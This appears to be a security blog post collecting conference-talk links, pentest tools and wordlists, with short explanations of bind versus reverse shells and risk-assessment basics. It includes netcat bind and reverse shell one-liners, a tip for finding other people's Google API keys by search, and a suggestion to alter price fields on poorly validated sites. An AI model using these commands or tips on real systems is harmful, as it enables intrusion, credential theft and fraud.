1) Dan Kaminsky Inducted to the Infosec Hall of fame + pushing for DNSSec
2) Whitefield Deffie on the Third age of Information Security ( or maybe the end of Information Security)
3) The e-crime Panel was a Fiasco.

I’ve complied a list of interesting articles and tools you might be interested in checking out. I’ve added some web application testing software as well as Dictionary Files + Pen testing tools.

Web Application Security

Dissecting Web Attacks

http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf

http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Web-Attack-Disection-slides.pdf

New Techniques for Defeating SSL/TLS

https://media.blackhat.com/bh-dc-09/video/Marlinspike/blackhat-dc-09-marlinspike-slide.mov

http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

XSS Anonymous Browser

http://www.blackhat.com/presentations/bh-dc-09/Flick/BlackHat-DC-09-Flick-XAB_Slides.pdf

http://www.blackhat.com/presentations/bh-dc-09/Flick/BlackHat-DC-09-Flick-XAB-wp.pdf

OWASP Linux Distro&Virtual Machine:

http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project

OWASP Running An ISO In Vmware

http://securitydistro.com/video-tutorials/53/Running-an-ISO-on-VMware.php

Acunetix WVS

http://www.acunetix.com/

WebScarab

http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

SPIKE Proxy : HTTP Hacking

http://www.immunitysec.com/resources-freesoftware.shtml

Rootkits + Pentesting

http://sectools.org/crackers.html

http://www.offensive-security.com/cons/shmoo2008/muts_at_shmoo.html

Fast-Track

http://www.thepentest.com/

http://www.shmoocon.org/slides/DKENNEDY_FastTrack_ShmooCon_2009.pdf

Wordlists/Dictionary Files:

http://www.outpost9.com/files/WordLists.html

ftp://ftp.ox.ac.uk/pub/wordlists/
ftp://ftp.mirrorgeek.com/openwall/wordlists

Alice in User-Land: Hijacking the Linux Kernel via /dev/mem

http://www.blackhat.com/presentations/bh-europe-09/Lineberry/BlackHat-Europe-2009-Lineberry-code-injection-via-dev-mem-slides.pdf

.NET Framework Rootkits: Backdoors Inside Your Framework

http://www.blackhat.com/presentations/bh-europe-09/Metula/BlackHat-Europe-2009-Metula-NET-Framework-rootkits-whitepaper.pdf

iRK – Crafting OS X Kernel Rootkits

https://www.blackhat.com/presentations/bh-usa-08/D’Auganno/D’Auganno_Extras.zip

https://www.blackhat.com/presentations/bh-usa-08/D’Auganno/BH_US_08_DAuganno_iRK_OS_X_Rootkits.pdf

A New Breed of Rootkit: The System Management Mode (SMM) Rootkit

https://www.blackhat.com/presentations/bh-usa-08/Embleton_Sparks/BH_US_08_Embleton_Sparks_SMM_Rootkits_Slides.pdf

https://media.blackhat.com/bh-usa-08/video/bh-us-08-Embleton/black-hat-usa-08-embleton-smmrootkit-hires.m4v

Nmap: Scanning the Internet

https://www.blackhat.com/presentations/bh-usa-08/Vaskovich/BH_US_08_Vaskovich_Nmap_Scanning_the_Internet.pdf

https://media.blackhat.com/bh-usa-08/video/bh-us-08-Fyodor/black-hat-usa-08-fyodor-nmap.m4v

Meet The Owner Of a Real Hacked Company – Forensic Investigation

https://www.blackhat.com/presentations/bh-usa-08/Shelhart/BH_US_08_Trustwave_Presentation_Shelhart_Meet_Owner.pdf

https://media.blackhat.com/bh-usa-08/video/bh-us-08-Shelhart/black-hat-usa-08-shelhart-hackedcompany-hires.m4v

Dan Kaminsky
Weaponizing Noam Chomsky, or Hacking with Pattern Language

http://www.shmoocon.org/2007/videos/Weaponizing%20Noam%20Chomsky,%20or%20Hacking%20with%20Pattern%20Languages%20-%20Dan%20Kaminsky.mp4

The free version of netstalker is now in the lab.

Webgoat is a vunerable server created and maintained by OWASP, it contains the latest vunerabilites, which Security proffesionals could try out. The link below, contains walkthroughs of these vunerabilities and challenges:

http://yehg.org/lab/pr0js/training/webgoat.php

The difference between a bind shell and a reverse bind shell:
Ever notice in the metasploit framework there are two types of payloads (bind/normal and reverse?)

you can bind an application to a particular port. for example : nc -lvvp 666 -e cmd.exe
This command indicates that the cmd is not binded to the port 666. anyone connecting to port 666 will get the cmd output

On the other hand if you are behind a nat it becomes a problem (and thats where reverse bind shell comes in)
First let nnetcat listen on a particular pot: nc -lvvp 666
and conect to it this port, but “throw” the cmd comand shell to it: nc -v “ip address ” 666 -e cmd.exe
As it is an outbound connection it will go through the NAT

What happens here is basically what happens during a client side attack a hacker sends a reverse shell to his listening server from the target machine. How he does that is another question, he can send trojans, worms, BO-exploits. It is essentially a backdoor type payload. Some reverse shells even use IE (the passive x payload) so it as if you are surfing the web.

Web sanning. Some tools like wikito can scan you site against all the google hacks db, for that you need a google API key….if you are lazy you can find that out through google. simple put “google.license_key” into google and you can find someone’s API key.

there are many sites such as langalaxy which do not have proper input validation so tools such as tamperdata for firefox or brup proxy and manipulate the price (and other) fields in order to change the value on the server.

XSS or cross side scripting is a pain of a vunerability. essentially the concept is very simple. If a webserver can accept javascript or other mobile code it can run scripts at the client. it can be inputed in a URL or in any field in a site for example:

http://yehg.org/lab/pr0js/files.php/webgoat_xsslab_stage1.zip

Information security risk is a threat and a vulnerability to an asset.

An asset can be people or machinery or information and they are given a value.

Those values are enhanced by either the threat or vulnerability. An Asset is something of value, it can be tangible or intangible, it can be a resource it can be a process (a way of doing something) it can be
a product or it can be a system it can be may other things.

A threat is a natural or man made circumstance, that is any potential cause of an
unwanted incident that causes harm or consequential loss to a system or
an organization. It is the cause of an incident, and vulnerability is a weakness
in a safeguard or a control. This is where Risk assessment comes into information security.

Vulnerability is the absence or a weakness of a safeguard
or a control of an asset or a group of assets that may be exploited by
a threat.

Scope
It has to be agreed before hand and if it is not the risk or redundancy and rework is high and the risk threat key risks are missed is also high
The first thing that has to happen in a risk assessment and this actually has to happen to any standard, is to define the scope. The definition of scope is a pre requisite to starting a risk activity/project. setting boundaries is a mandatory part of a process so after the scope,
the organisation identifies the assets and gives them a value. A value can be a value to whichever process they want to undertake,
the whole point of giving values is that one can scale them. Thus an organization
can prioritize them start from the top and work its way down.

So having given values on the impact of failure and the likely hood of the
Threat, assessing the likely hood of a threat which depends on what sort of business is the organisation in. it depends on the industry its in its all very subjective but threats are assessed by how likely the incident is to occur and from that an organization can determine over all risk in terms of priority, how likely is this to happen, then evaluate these controls and are these controls enough?
Residual riskAt the bottom there will always be residual risk. Therefore it is imperative that information security officers objectively assess which risks are left over present their findings and have management sign off on them.

HTTPS: Web communications that are secured by SSL/TLS are called HTTPS.